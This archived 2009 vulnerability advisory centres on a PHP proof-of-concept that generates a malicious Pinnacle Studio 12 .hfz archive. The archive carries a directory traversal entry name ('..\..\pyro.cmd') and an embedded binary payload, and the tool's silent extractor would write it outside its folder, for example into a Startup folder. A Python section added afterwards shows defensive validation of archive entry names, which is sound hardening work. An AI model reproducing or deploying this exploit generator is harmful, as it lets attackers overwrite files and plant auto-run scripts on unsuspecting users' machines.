SECURITYVULNS:DOC:21823
May 13, 2009

Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal vulnerability poc

2009-05-13 00:00:00
vulners.com

<?php
/*
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis

Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/
 
Some keys exported from the registry:

[HKEY_CLASSES_ROOT\.hfz]
@="hfzfile"

[HKEY_CLASSES_ROOT\.hfz\hfzfile]

[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]

[HKEY_CLASSES_ROOT\hfzfile]
@="Hollywood FX Compressed Archive"

[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
@="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"

[HKEY_CLASSES_ROOT\hfzfile\shell]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
@="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
00,22,00,00,00,00,00

Usually files are decompressed into a Pinnacle effects folder...
Problem is that .hfz files can be used to overwrite files on the target system
or to place scripts in Startup folders by directory traversal,
and InstallHFZ.exe decompresses them with no prompts!
Just modified an existing .hfz file and here is the dump ...
Also I experienced some crashes in doing this... investigating...

*/

// entry name stored in the archive: climbs out of the effects folder
$____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";

// dump of the modified .hfz, with the traversal path spliced in
$____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00".
"\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a".
"\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b".
"\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04".
"\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb".
"\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2".
"\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51".
"\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2".
"\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5".
"\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99".
"\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93".
"\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0".
"\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3".
"\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd6".
"\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27".
"\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4".
"\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c".
"\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc".
"\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9".
"\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19".
"\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5".
"\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09".
"\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80".
"\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26".
"\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a".
"\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e".
"\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97".
"\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b".
"\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1\xf4\x69\x09\x3c\x44\x0a\x0b\xff".
"\x22\x60\x7a\x7a\x3c\x44\x01\xe7\x86\x0d\x33\xe4\x29\x56\xf7\x01".
"\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3".
"\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b".
"\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48".
"\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32".
"\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef".
"\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91".
"\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90".
"\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08".
"\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65".
"\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf".
"\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c".
"\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac".
"\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78".
"\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54".
"\x82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c".
"\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f".
"\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e".
"\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0".
"\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60".
"\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9".
"\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3".
"\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e".
"\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82".
"\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8".
"\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e".
"\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3".
"\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34".
"\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59".
"\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe5\x9d\xed\xef\x9f\x95\xed".
"\xa8\x90\xe2\xe2\x69\x72\x50\x04\x1b\x88\x3e\x89\x00\x3c\x5a\xff".
"\xd5\x65\xc7\xe1\x0f\x8a\x9d\x1f\x97\xb8\xb0\xb4\xc9\x74\xe1\xd2".
"\xa5\x4b\x1c\xa4\x88\xb0\x70\xbb\xe9\xdd\xa2\xa2\xef\x2a\x2b\xef".
"\x6d\xd9\xc2\x1e\xed\xf8\x0c\x87\xfe\xb5\x82\xd0\xc3\x60\xd8\x0e".
"\x48\x36\x6d\x62\x7b\xba\xba\x44\x86\x61\x39\x7c\x36\x69\x34\x9a".
"\xba\xba\xfa\x77\x68\x27\xf0\x64\x64\x7c\x8e\x1e\x0e\x0f\xda\xb5".
"\xba\x01\x9a\xbe\x68\xb3\x3d\x82\x4e\x37\x9f\xf7\x17\xf3\xd1\x84".
"\x97\xb2\xf3\x92\x15\xd9\x4f\x39\x99\x98\x98\x20\xeb\xe2\xdc\x65".
"\x50\x26\xef\xd1\x37\x64\x19\x3e\x8b\x8a\x8a\xe2\xe3\xc9\x32\x9c".
"\xac\xa8\xb8\xd3\xde\xce\x8e\x87\x1b\x00\x0c\xf4\x2c\x06\x12\x72".
"\x14\xdc\x1b\x2c\x35\x34\x30\x4d\x4d\x9e\xc3\x06\x61\x9b\x4f\x85".
"\xcb\xe5\x22\x5f\x99\xfc\xcd\xe2\x99\xb0\x88\x92\x92\x5f\x0a\x0a".
"\xfe\xc4\x78\xf8\x21\x08\x07\x4b\x7d\x7d\x8c\xc3\xc1\x48\x7f\xbc".
"\x04\x75\x72\xac\x0e\xdf\x6e\x6b\x63\x4d\x09\x23\x92\xd0\x4b\x4d".
"\x3d\x74\x3b\x70\x01\xc2\xda\x9c\x63\x55\x55\x8f\x89\x12\x4c\x21".
"\xd2\xd8\xc8\x12\x0e\x9d\x38\x4d\xc9\x66\x69\xdb\x36\x76\x5b\x81".
"\x12\xe0\x21\xa9\x60\x70\x90\xed\x17\x10\xc2\x95\xc9\xc9\x49\xda".
"\xf0\x49\x75\xb5\x30\x10\xb8\x2f\x17\x38\x52\x6f\xaf\xd4\xf7\x54".
"\x50\x41\x74\xec\xde\xed\xc9\x4b\x50\x88\x36\x10\xe2\xd8\x1f\x1d".
"\x9d\x0e\x2a\x38\x24\x37\x6f\xde\x8c\x8c\x8c\xb4\x5a\x67\x02\xe9".
"\x01\x12\x58\x1f\xc1\x8b\xb7\x83\x06\xec\x5c\x65\x65\x77\x65\x13".
"\x05\xc1\x7b\xd9\xdd\x99\x13\x0a\xe1\x51\xa4\x93\xa6\xcf\x47\x46".
"\xc6\x28\x95\x85\x36\x5b\x90\x0f\x6d\xbb\x7b\x0b\x20\xfe\x83\x78".
"\x21\x9c\xcb\x76\x27\xbb\x3b\x3b\xe1\x8a\xbd\x0f\x07\x57\x34\x48".
"\x42\x58\x28\xed\xb0\x54\x67\x27\x1b\x14\x08\x3d\x72\xe0\x44\xbc".
"\xc8\x86\x04\x72\x48\x03\x84\x93\x2c\x07\xce\x83\x6e\x79\xfe\x82".
"\xb4\x06\xae\xc8\xdb\xe5\xe6\xde\xe1\x82\xd7\x5f\x42\x4c\x11\xe4".
"\x68\x07\x6f\x87\xc8\xce\x2a\x5c\xc0\xf6\xf7\x33\x24\x53\xc9\x16".
"\xd0\x02\x25\x7b\xf6\x2c\x4a\x89\xc9\x74\x0b\x2e\x84\x24\x40\x72".
"\xf8\xe2\x45\xde\x09\x53\x20\x41\x7f\x71\xfa\xff\x85\x6f\x71\x4b".
"\x85\x4d\x67\x45\x7a\x9b\x0a\x9f\xff\x75\x91\x2b\x0a\x4f\x25\x17".
"\xae\xc1\xfe\xf0\x48\xb3\x8d\x70\xfe\x14\x3c\x8a\xe1\xcd\x3d\x92".
"\x5f\x5e\xad\x9d\x43\x63\xfc\x39\xaf\x66\x93\x8a\xb4\xc2\xa9\x08".
"\xd1\x5f\x36\x97\x84\xf4\xab\xe7\xd5\xb1\xd2\x1c\xe1\xbc\x0b\x63".
"\xa5\xc6\xd6\x96\xf8\x11\x8a\x1a\x1d\xf1\x7d\x46\x1b\xbd\xf5\xea".
"\xd8\x98\xcf\x3c\x05\x59\x6f\x54\xaf\xff\x06\x73\xe8\x51\xc1\x82".
"\xc6\xf9\xea\xc3\x49\xe8\xf3\xbc\x04\x5c\xe3\x08\x30\x87\x42\x00".
"\x1d\x4c\xf1\x47\x47\x96\x89\x01\x0a\x3a\x0f\xc4\x19\x7d\x1f\x2d".
"\xa1\xd2\x22\xed\x23\x85\xbf\x66\x4a\x12\x27\x24\x20\x54\x43\x51".
"\x65\xf9\x79\x5a\xd6\xb7\x8e\xbd\x38\xff\x88\xa2\x5e\x40\x2d\x72".
"\xf6\xf6\xa9\xab\xdb\x9b\x9a\x9d\x6a\xbd\xf0\x3e\x82\xe2\x8f\x16".
"\x96\x97\xd6\xe2\x72\xc4\xab\xf9\xb8\x94\x66\xad\xf0\x7e\x21\x9a".
"\x4f\x48\x69\xd6\x09\xef\x43\xd1\x5c\x69\x2d\xd0\x9e\x44\xe3\xed".
"\x68\xfe\x58\xf7\x7f\x0c\x1c\x8d\x3b\x9a\x7a\x9c\xdd\x6a\x3d\x45".
"\x0d\x19\xe7\xab\xb8\x36\x91\xa2\xa0\xc2\x28\x12\x93\x34\xed\x3f".
"\xcd\x4b\xbf\x58\xe1\x59\xab\xc9\x8b\x14\x25\xcc\x7d\x65\x11\x0f".
"\xe3\xef\x01\x1f\xc4\xac\x37\x7b\x08\x15\x81\xcb\xd5\xf3\x5d\xd4".
"\x20\xfa\xcc\x22\x60\xa5\xe1\x1e\x0f\x09\x2e\xfb\x3f\x95\x68\x4f".
"\x65\xdb\x2f\xcf\xc3\x3d\x18\x00\xae\x4e\x16\xbb\xc1\xe0\x9e\x90".
"\x0b\x37\xd7\x54\xa6\xeb\x45\xb3\xfb\x55\x3e\x5c\xf6\x61\x99\xa3".
"\xbd\x4b\x9d\xeb\xe8\x6c\xee\x71\xf8\x68\xa3\x03\x69\xbf\xd2\x13".
"\x6b\x46\x7a\x7b\x9d\xa2\xb6\x99\xac\xdf\x1e\xcd\xf1\x56\xf6\x99".
"\xe2\xbd\xf7\xa3\x15\x0a\xde\x34\xd7\xf5\xf5\x16\x73\x89\xf6\x53".
"\x34\x69\x15\x7f\xe9\x67\x29\xe2\x8a\x6a\xfd\x3a\xb4\xf6\x76\xf7".
"\x38\x9b\xba\x1d\x7d\x6d\xfb\x32\x2d\x0d\xdb\x9b\x1b\xfb\x7a\x33".
"\xd3\xd2\xd4\xc9\xea\x5c\x67\x67\xa7\xb3\x2b\x93\x0c\x4c\x69\x6b".
"\x71\x0a\x40\x8d\x0a\x38\xa0\x79\x55\xbc\x28\xdc\x21\x21\xdc\x3e".
"\x10\x84\x5e\x98\x26\x3f\x98\x05\x1d\x8e\x3e\xb5\x36\x04\x98\x64".
"\xa0\x17\x66\x65\xd6\x8d\x9c\x75\x75\xc6\x91\xef\xef\xfe\xe4\x93".
"\xed\x96\x7e\x99\x6e\xf4\x56\x0f\x24\x31\x98\x07\xa4\x61\x9a\xc5".
"\x61\xea\x42\x85\xa9\xe3\xb1\x19\x34\x99\x4b\xc0\x3c\x28\x0e\xf3".
"\x5f\x77\x19\xc2\x8e\x00\x00\x48\x46\x58\x5a\x28\x00\x00\x00\x44".
"\x00\x00\x00\x00\x11\x00\x00\x00\x7e\x6f\x72\x67\x73\x3a\x65\x66".
"\x66\x65\x63\x74\x73\x2e\x6f\x72\x67\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x34\x00\x00";

// write the modified archive to disk (binary mode)
$_f = fopen("puf.hfz", "wb");
fputs($_f, $____payload);
fclose($_f);

?>
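The bug described in the comment block is the classic archive-extraction failure: an entry name is joined to the effects folder without checking that the result stays inside it. The check below is an added example written for this page, not the PoC author's code and not Pinnacle's; it assumes entry names are available as plain Windows-style strings (the .hfz entry layout is not documented here) and uses the PoC's own entry name and the InstallHFZ.exe folder from the registry dump as constructed sample input.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Entry names that are absolute in any Windows sense: "C:...", "\\server\share", "\x", "/x"
_ABSOLUTE = re.compile(r"^(?:[A-Za-z]:|[\\/])")

def normalize_entry(name: str) -> Optional[str]:
    """Lexically normalise a Windows-style archive entry name.

    Returns the cleaned relative path with backslash separators, or None when
    the entry is absolute, contains a NUL, or would climb above the root.
    """
    if not name or "\x00" in name or _ABSOLUTE.match(name):
        return None
    parts: List[str] = []
    for seg in re.split(r"[\\/]+", name):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None          # nothing left to pop: escapes the root
            parts.pop()
            continue
        if seg != seg.rstrip(". "):  # Win32 silently strips trailing dots/spaces
            return None
        parts.append(seg)
    return "\\".join(parts) if parts else None

def safe_extract_path(dest_root: str, name: str) -> Optional[str]:
    """Final on-disk path for an entry, or None if the entry must be rejected."""
    rel = normalize_entry(name)
    return None if rel is None else ntpath.join(dest_root, rel)

def plan_extraction(dest_root: str, names: List[str]) -> Tuple[Dict[str, str], List[str]]:
    """Partition entry names into accepted {name: path} and rejected [name]."""
    accepted: Dict[str, str] = {}
    rejected: List[str] = []
    for n in names:
        p = safe_extract_path(dest_root, n)
        if p is None:
            rejected.append(n)
        else:
            accepted[n] = p
    return accepted, rejected

# Constructed sample: the PoC's entry name beside a benign and an absolute one
EFFECTS_DIR = r"C:\Documents and Settings\All Users.WINDOWS\Documenti\Pinnacle\Content\HollywoodFX"
SAMPLE_ENTRIES = [
    r"..\..\..\..\..\..\..\..\pyro.cmd",  # traversal entry from the PoC
    r"Flights\fire.hfx",                   # ordinary relative entry
    r"C:\Windows\startup.cmd",             # absolute path, must be rejected
]
```

An extractor that drops rejected entries (and logs them) instead of writing them is what turns this class of .hfz file into a harmless failed import.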

original url: http://retrogod.altervista.org/9sg_pinnacle_studio_12_hfz.htm